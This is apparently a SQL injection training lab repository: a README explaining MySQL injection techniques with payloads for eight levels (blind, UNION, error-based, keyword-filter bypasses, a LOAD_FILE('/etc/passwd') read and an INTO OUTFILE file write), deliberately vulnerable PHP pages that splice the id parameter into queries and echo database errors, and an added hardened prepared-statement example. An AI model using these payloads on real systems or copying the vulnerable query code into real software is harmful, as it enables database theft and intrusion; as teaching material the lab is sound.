├── README.md
├── login.php
├── setup-db.php
├── sql-1.php
├── sql-2.php
├── sql-3.php
├── sql-4.php
├── sql-5.php
├── sql-6.php
├── sql-7.php
├── sql-8.php
└── sql-connect.php

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# SQL-Injection

SQL injection arises when an application, in passing a SQL query to the back-end database, gives an attacker the ability to influence that query. In short, the code was written without proper validation and handling of user-controllable variables, so untrusted data is sent to the database as part of a command or query, and the vulnerability follows.

## MySQL injection

### MySQL database version
- `VERSION()` < 5.0: no `information_schema` database;
- `VERSION()` > 5.0: the built-in `information_schema` database exists, so table names can be looked up quickly;
- `VERSION()` > 5.5: the built-in `information_schema` and `performance_schema` databases both exist (the latter collects database server performance parameters);

### Comment sequences
- `#` `/*` `-- -` `;%00`
- Worth noting: the Access database has no comment sequence, but under certain conditions `%00` can be used in its place.

### Injection techniques
- in-band: uses the existing channel between the attacker and the vulnerable web application to inject and extract data; UNION injection and error-based injection;
- inference: injects by passing different parameter values and observing the differences in the web application's behaviour; boolean-based blind and time-based blind;
- out-of-band: when the existing channel cannot carry the extracted data, another channel is tried, such as e-mail, HTTP/DNS or the file system;

### MySQL file read/write
- `LOAD_FILE()`
  - `SELECT LOAD_FILE('/etc/passwd');`
  - the mysqld user must have permission to read the file, and the file must be smaller than `max_allowed_packet`;
- `INTO OUTFILE`
  - `SELECT '' INTO OUTFILE '/var/www/1.php';`
  - `INTO OUTFILE` cannot overwrite an existing file;

### Commonly used functions
- `@@VERSION` `VERSION()` `current_user` `database()` `@@HOSTNAME`

## SQL
- [SQL-1](#sql-1)
- [SQL-2](#sql-2)
- [SQL-3](#sql-3)
- [SQL-4](#sql-4)
- [SQL-5](#sql-5)
- [SQL-6](#sql-6)
- [SQL-7](#sql-7)
- [SQL-8](#sql-8)


## SQL-1
### mysql_query
- `SELECT * FROM users WHERE id=1 LIMIT 0,1;`
### Payload
- time-based blind
  - `id=1 AND SLEEP(5)`
  - `id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))Kevinsa)`
- boolean-based blind
  - `id=1 AND 6036=6036`
- UNION query
  - `id=-3563 UNION ALL SELECT NULL,NULL,CONCAT()--`

## SQL-2
Unlike SQL-1, where `$id` is passed straight into the query, SQL-2 wraps it in single quotes, so the SQL-1 payloads must first close the `'`;
### mysql_query
- `SELECT * FROM users WHERE id='$id' LIMIT 0,1;`
### Payload
- time-based blind
  - `id=1' AND SLEEP(5) AND 'sql'='sql`
  - `id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))Kevinsa) and 'Kevinsa'='Kevinsa`
- boolean-based blind
  - `id=1' AND 6036=6036 AND 'Drgh'='Drgh`
- UNION query
  - `id=-3563' UNION ALL SELECT NULL,NULL,CONCAT()-- Kevinsa'`

## SQL-3
### mysql_query
- `SELECT * FROM users WHERE id=($id) LIMIT 0,1;`
### Payload
- time-based blind
  - `?id=1) AND SLEEP(5) AND (1=1#`
- boolean-based blind
  - `?id=1) AND 1378=1379 AND ('ARzY'='ARzY'`

## SQL-4
SQL-4 is similar to SQL-1: injection works without having to close any delimiter. What sets SQL-4 apart is that `mysql_error();` is echoed, so the error-based technique can be used to extract data.
### mysql_query
```
$sql_query="SELECT * FROM users WHERE id=$id LIMIT 0,1";
mysql_query($sql_query);
echo mysql_error();
```

### Payload
- error-based blind
  - `?id=1 AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(user(),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)`
    - duplicate-primary-key error from `floor(rand(0)*2)`, `count(*)` and `group by`. The principle: when `rand()` is used in a query with `group by`, `floor(rand(0)*2)` is evaluated once for the lookup, and when the key is not yet in the temporary table x it is evaluated again on insert; the error arises precisely because `floor(rand(0)*2)` is deterministic, producing the sequence 0, 1, 1. Article: Wooyun knowledge base, "Analysis of MySQL error-based injection (count(), rand(), group by)".
  - `id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))`
    - `extractvalue` is a built-in XML parsing and modification function introduced in MySQL 5.1, with the syntax `extractvalue(XML_document, XPath_string)`; XML_document is a string, and when we pass a numeric value instead, `extractvalue()` raises an error;
  - `id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1))`
    - `extractvalue` and `updatexml` both yield error-based injection through XPath syntax errors. From version > 5.1.5 these two XML query and modification functions are provided: `extractvalue` looks up node content in an XML document by XPath, and `updatexml` modifies the content found. The second argument of both must be a string that conforms to XPath syntax; if we pass a number, an error is produced. `updatexml` is likewise a built-in XML parsing and modification function in MySQL 5.1, with the syntax `updatexml(XML_document, XPath_string, new_value)`; XML_document is a string, and when we pass a numeric value instead, `updatexml()` raises an error;
### About
- For version > 5.0.12, the error from a duplicate `name_const()` can be used to extract data: `select * from(select name_const(version()),1),name_const(version(),1);`
- Error-based extraction through integer overflow: for 5.5.5 > version > 5.5 information can be returned; note that the error message has a length limit, `#define ERRMSGSIZE (512)`.

## SQL-5
Although SQL-5 builds its SQL query the same way as SQL-1, the PHP code has no output point for the result, and a boolean-based condition does not change what the page prints, so only time-based blind injection remains.
### mysql_query
```
$sql_query="SELECT * FROM users WHERE id=$id LIMIT 0,1";
/* echo mysql_query(); */
```
### Payload
- time-based blind
  - `id=1 AND SLEEP(5)`
  - `id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))Kevinsa)`


## SQL-6
Compared with SQL-1, SQL-6 adds one crude layer of filtering: `function sqlentities()` filters the value of the id parameter against a blacklist.
### mysql_query
```
function sqlentities($var) {
    $var = str_replace("select"," ",$var);
    $var = str_replace("sleep"," ",$var);
    $var = str_replace("and"," ",$var);
    $var = str_replace("from"," ",$var);
    $var = str_replace("where"," ",$var);
    $var = str_replace("union"," ",$var);

    return $var;
}
```
### Payload
The simplest way: mixed case gets past the filter.
- time-based blind
  - `id=1 AND SLEEP(5)`
  - `id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))Kevinsa)`
- boolean-based blind
  - `id=1 AND 6036=6036`
- UNION query
  - `id=-3563 UNION ALL SELECT NULL,NULL,CONCAT()--`

## SQL-7
Compared with SQL-6, SQL-7 matches case-insensitively, so mixed case no longer bypasses the filter.
### mysql_query
```
function sqlentities($var) {
    $var = preg_replace('/(select|where|sleep|and|from|union)/i',"",$var);
    return $var;
}
```

### Payload
- time-based blind
  - `id=1 ANandD SLandEEP(5)`
  - `id=1 AND (SELEandCT * FandROM (SandELECT(SLandEEP(5)))Kevinsa)`
- boolean-based blind
  - `id=1 ANandD 6036=6036`
- UNION query
  - `id=-3563 UNandION ALL SELECandT NULL,NULL,CONCAT()--`

## SQL-8
### mysql_query
```
$name=$_POST['username'];
$password=$_POST['password'];
```

--------------------------------------------------------------------------------
/login.php:
--------------------------------------------------------------------------------
<?php
// Lines 1-16 of this file (the opening PHP block; collect_data(), called
// below, is defined or included there) were stripped from the page and are
// not recoverable. HTML tags inside the echoed strings were stripped as well:
// <br> is assumed where a line break was echoed, and strings that echoed only
// a stripped tag are left empty.
$username = $_POST['username'];
$password = $_POST['password'];
if ($name == "")          // $name is never assigned in the visible code
{
    echo "请填写用户名<br>";
    echo "";
}
elseif ($password == "")
{
    //echo "请填写密码<br>返回";
    echo "";
}
else
{
    $colum = collect_data();
    // plaintext comparison against the stored row; no hashing anywhere in this lab
    if (($colum['username'] == $username) && ($colum['password'] == $password))
    {
        //echo "验证成功!<br>";
        echo "";
    }
    else
        //echo "密码错误<br>";
        echo "";
        //echo "返回";
}
?>
--------------------------------------------------------------------------------
/setup-db.php:
--------------------------------------------------------------------------------
<?php
// Lines 1-34 (HTML page head and navigation) and lines 35-47 (the opening PHP
// block: the database connection and the first statement, presumably $sql1,
// whose success branch ends on line 48) were stripped from the page and are
// not recoverable. The <br> tags inside echo "..." strings were stripped too
// and are restored here. The page resumes mid-statement at line 48:
    echo "<br>";}
else {
    echo mysql_error();
    echo "<br>";}
$sql2 = "CREATE DATABASE `challenge` CHARACTER SET `gbk`";
if (mysql_query($sql2)) {
    echo "成功创建数据库";
    echo "<br>";}
else {
    echo mysql_error();
    echo "<br>";}
$sql3 = "CREATE TABLE challenge.users (id int(3) NOT NULL AUTO_INCREMENT, username varchar(20) NOT NULL, password varchar(20) NOT NULL, PRIMARY KEY (id))";
if (mysql_query($sql3)) {
    echo "成功写入字段";
    echo "<br>";}
else {
    echo mysql_error();
    echo "<br>";}
// passwords are stored in clear text; the doubled quote in 'angle''' stores the value angle'
$sql4 = "INSERT INTO challenge.users (id, username, password) VALUES ('1', 'kevin', 'Kevin'), ('2', 'angle', 'angle'''), ('3', 'Miss', 'miss')";
if (mysql_query($sql4)) {
    echo "成功写入数据";
    echo "<br>";}
else {
    echo mysql_error();
    echo "<br>";}
$sql5 = "CREATE TABLE challenge.emails
(
id int(3)NOT NULL AUTO_INCREMENT,
email_id varchar(30) NOT NULL,
PRIMARY KEY (id)
)";
if (mysql_query($sql5)) {
    echo "成功创建新的数据表";
    echo "<br>";}
else {
    echo mysql_error();
    echo "<br>";}
$sql6 = "INSERT INTO `challenge`.`emails` (id, email_id) VALUES ('1', 'Dumb@dhakkan.com'), ('2', 'Angel@iloveu.com'), ('3', 'Dummy@dhakkan.local'), ('4', 'secure@dhakkan.local'), ('5', 'stupid@dhakkan.local'), ('6', 'superman@dhakkan.local'), ('7', 'batman@dhakkan.local'), ('8', 'admin@dhakkan.com')";
if (mysql_query($sql6)) {
    echo "成功写入数据";
    echo "<br>";}
else {
    echo mysql_error();
    echo "<br>";}

?>
--------------------------------------------------------------------------------
/sql-1.php:
--------------------------------------------------------------------------------
<?php
// Lines 1-50 (HTML page head and navigation) and lines 51-58 (the opening PHP
// block) were stripped from the page and are not recoverable. The <br> tags
// inside the surviving echo "..." strings were stripped too and are restored here.
if (isset($_GET['id'])) {
    $id = $_GET['id'];
    echo "传入的值:id=" .$id;
    echo "<br>";

    // $id is concatenated straight into the query text: the injection point the README's SQL-1 section exercises
    $sql_query = "SELECT * FROM users WHERE id=$id LIMIT 0,1";
    print_r("$sql_query");
    echo "<br>";
    $result = mysql_query($sql_query);

    $arr = mysql_fetch_array($result);

    if ($arr) {
        echo "<br>";
        echo "<br>";
        echo "Username: " .$arr['username'];
        echo "<br>";
        echo "Password: " .$arr['password'];
        echo "<br>";
    } else {
        echo "<br>";
        echo "sql查询失败";
    }
    echo "<br>";
}
?>
--------------------------------------------------------------------------------
/sql-2.php:
--------------------------------------------------------------------------------
<?php
// Lines 1-50 (HTML page head and navigation) and lines 51-58 (the opening PHP
// block) were stripped from the page and are not recoverable. The <br> tags
// inside the surviving echo "..." strings were stripped too and are restored here.
if (isset($_GET['id'])) {
    $id = $_GET['id'];
    echo "传入的值:id=" .$id;
    echo "<br>";

    // same interpolation as sql-1.php, but inside single quotes (README, SQL-2)
    $sql_query = "SELECT * FROM users WHERE id='$id' LIMIT 0,1";
    print_r("$sql_query");
    echo "<br>";
    $result = mysql_query($sql_query);
    $arr = mysql_fetch_array($result);

    if ($arr) {
        echo "<br>";
        echo "<br>";
        echo "Username: " .$arr['username'];
        echo "<br>";
        echo "Password: " .$arr['password'];
        echo "<br>";
    } else {
        echo "sql查询失败";
    }
    echo "<br>";
}
?>
--------------------------------------------------------------------------------
/sql-3.php:
--------------------------------------------------------------------------------
<?php
// Lines 1-50 (HTML page head and navigation) and lines 51-56 (the opening PHP
// block) were stripped from the page and are not recoverable. The <br> tags
// inside the surviving echo "..." strings were stripped too and are restored here.
echo "<br>";
if (isset($_GET['id'])) {
    $id = $_GET['id'];
    echo "传入的值:id=" .$id;
    echo "<br>";

    // interpolation inside parentheses (README, SQL-3)
    $sql_query = "SELECT * FROM users WHERE id=($id) LIMIT 0,1";
    print_r("$sql_query");
    $result = mysql_query($sql_query);
    $arr = mysql_fetch_array($result);

    if ($arr) {
        echo "<br>";
        echo "<br>";
        echo "Username: " .$arr['username'];
        echo "<br>";
        echo "Password: " .$arr['password'];
        echo "<br>";
    } else {
        echo "<br>";
        echo "sql查询失败";
    }
    echo "<br>";
}
?>
--------------------------------------------------------------------------------
/sql-4.php:
--------------------------------------------------------------------------------
<?php
// Lines 1-50 (HTML page head and navigation) and lines 51-58 (the opening PHP
// block) were stripped from the page and are not recoverable. The <br> tags
// inside the surviving echo "..." strings were stripped too and are restored here.
if (isset($_GET['id'])) {
    $id = $_GET['id'];
    echo "传入的值:id=" .$id;
    echo "<br>";

    $sql_query = "SELECT * FROM users WHERE id=$id LIMIT 0,1";
    print_r("$sql_query");
    echo "<br>";
    $result = mysql_query($sql_query);

    $arr = mysql_fetch_array($result);

    if ($arr) {
        echo "<br>";
        echo "<br>";
        echo "Username: " .$arr['username'];
        echo "<br>";
        echo "Password: " .$arr['password'];
        echo "<br>";
    } else {
        echo "<br>";
        // the driver's error text is sent to the client: the error-based channel the README's SQL-4 section relies on
        echo mysql_error();
    }
    echo "<br>";
}
?>
--------------------------------------------------------------------------------
/sql-5.php:
--------------------------------------------------------------------------------
<?php
// Lines 1-50 (HTML page head and navigation) and lines 51-58 (the opening PHP
// block) were stripped from the page and are not recoverable. The <br> tags
// inside the surviving echo "..." strings were stripped too and are restored here.
if (isset($_GET['id'])) {
    $id = $_GET['id'];
    echo "传入的值:id=" .$id;
    echo "<br>";

    $sql_query = "SELECT * FROM users WHERE id=$id LIMIT 0,1";
    print_r("$sql_query");
    echo "<br>";
    $result = mysql_query($sql_query);

    // the whole output block is commented out, so neither rows nor errors reach the page; only timing is observable (README, SQL-5)
    /*$arr = mysql_fetch_array($result);

    if ($arr) {
        echo "<br>";
        echo "<br>";
        echo "Username: " .$arr['username'];
        echo "<br>";
        echo "Password: " .$arr['password'];
        echo "<br>";
    } else {
        echo "<br>";
        echo mysql_error();
    }*/
    echo "<br>";
}
?>
--------------------------------------------------------------------------------
/sql-6.php:
--------------------------------------------------------------------------------
<?php
// Lines 1-50 (HTML page head and navigation) and lines 51-70 (the opening PHP
// block) were stripped from the page and are not recoverable. The function
// sqlentities() below is reproduced from the README's SQL-6 section, which
// documents it as this file's filter; the <br> tags inside the surviving
// echo "..." strings were stripped too and are restored here.
function sqlentities($var) {
    // case-sensitive, single-pass keyword removal
    $var = str_replace("select"," ",$var);
    $var = str_replace("sleep"," ",$var);
    $var = str_replace("and"," ",$var);
    $var = str_replace("from"," ",$var);
    $var = str_replace("where"," ",$var);
    $var = str_replace("union"," ",$var);

    return $var;
}

if (isset($_GET['id'])) {
    $id = sqlentities($_GET['id']);
    echo "传入的值:id=" .$id;
    echo "<br>";

    $sql_query = "SELECT * FROM users WHERE id=$id LIMIT 0,1";
    print_r("$sql_query");
    echo "<br>";
    $result = mysql_query($sql_query);

    $arr = mysql_fetch_array($result);

    if ($arr) {
        echo "<br>";
        echo "<br>";
        echo "Username: " .$arr['username'];
        echo "<br>";
        echo "Password: " .$arr['password'];
        echo "<br>";
    } else {
        echo "<br>";
        echo "sql查询失败";
    }
    echo "<br>";
}
?>
--------------------------------------------------------------------------------
/sql-7.php:
--------------------------------------------------------------------------------
<?php
// Lines 1-50 (HTML page head and navigation) and lines 51-79 (the opening PHP
// block) were stripped from the page and are not recoverable. The function
// sqlentities() below is reproduced from the README's SQL-7 section, which
// documents it as this file's filter; the <br> tags inside the surviving
// echo "..." strings were stripped too and are restored here.
function sqlentities($var) {
    // case-insensitive, but still a single non-recursive pass
    $var = preg_replace('/(select|where|sleep|and|from|union)/i',"",$var);
    return $var;
}

if (isset($_GET['id'])) {
    $id = sqlentities($_GET['id']);
    echo "传入的值:id=" .$id;
    echo "<br>";

    $sql_query = "SELECT * FROM users WHERE id=$id LIMIT 0,1";
    print_r("$sql_query");
    echo "<br>";
    $result = mysql_query($sql_query);

    $arr = mysql_fetch_array($result);

    if ($arr) {
        echo "<br>";
        echo "<br>";
        echo "Username: " .$arr['username'];
        echo "<br>";
        echo "Password: " .$arr['password'];
        echo "<br>";
    } else {
        echo "<br>";
        echo "sql查询失败";
    }
    echo "<br>";
}
?>
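The handlers in sql-1.php through sql-7.php all build the query by interpolating `$_GET['id']` into a string, and the keyword blacklists in sql-6.php and sql-7.php leave that unchanged, which is why the README's payloads keep working against them. The following is an added example written by the editor, not code from this repository: the same lookup with the id validated as an integer and bound as a parameter of a mysqli prepared statement, with database errors logged on the server instead of echoed to the client as sql-4.php does. The function names, the `webapp` account and its placeholder password are assumptions.

```php
<?php
// Added example (editor's code, not part of this repository): hardened
// counterpart of the id lookup in sql-1.php .. sql-7.php.
// Assumptions: the mysqli extension; a database account `webapp` (placeholder
// password below) granted only SELECT on challenge.users; PHP 7.1 or later.

// Turns the raw ?id= value into a positive integer, or null when it is not one.
// Anything that is not a plain integer ("1 AND SLEEP(5)", "1'", "-1 UNION ...")
// is rejected here, before any SQL text is built.
function parse_id($raw): ?int
{
    if (!is_string($raw)) {          // missing parameter or ?id[]=... array form
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Looks up one user by id with a prepared statement. The id travels as a bound
// parameter, so it is never part of the SQL text and cannot change its structure.
// Returns the row (id, username) or null; database errors surface as
// mysqli_sql_exception because of the report mode set below.
function find_user_by_id(mysqli $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT id, username FROM users WHERE id = ? LIMIT 1');
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return $row ?: null;
}

// Make mysqli throw instead of returning false, so no error is silently ignored.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

$id = parse_id($_GET['id'] ?? null);
if ($id === null) {
    http_response_code(400);
    echo 'invalid id';
    exit;
}

try {
    $db = new mysqli('localhost', 'webapp', 'PLACEHOLDER_PASSWORD', 'challenge');
    $db->set_charset('utf8mb4');
    $row = find_user_by_id($db, $id);
    // Only the username is returned, HTML-escaped; the password column is never
    // selected, so this lookup cannot leak it the way sql-1.php does.
    echo $row === null
        ? 'no such user'
        : 'Username: ' . htmlspecialchars($row['username'], ENT_QUOTES, 'UTF-8');
} catch (mysqli_sql_exception $e) {
    // Unlike sql-4.php, the driver's error text stays in the server log; the
    // client gets a generic message, which closes the error-based channel.
    error_log('user lookup failed: ' . $e->getMessage());
    http_response_code(500);
    echo 'lookup failed';
}
```

Requested as `?id=1` it prints the username; `?id=1 AND SLEEP(5)` or `?id=1'` is refused by `parse_id()` before a query exists, and even if that check were removed, `bind_param('i', ...)` sends the value as one integer parameter rather than as SQL text. The blacklist approach of sql-6.php and sql-7.php is not needed at all once the query is parameterised.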
--------------------------------------------------------------------------------
/sql-8.php:
--------------------------------------------------------------------------------
(The HTML of this page and its PHP block, lines 157-178, were stripped from the page and are not recoverable; the README's SQL-8 section shows the two lines it starts with, `$name=$_POST['username'];` and `$password=$_POST['password'];`.)
--------------------------------------------------------------------------------
/sql-connect.php:
--------------------------------------------------------------------------------
(The file's single PHP block was stripped from the page and is not recoverable.)
--------------------------------------------------------------------------------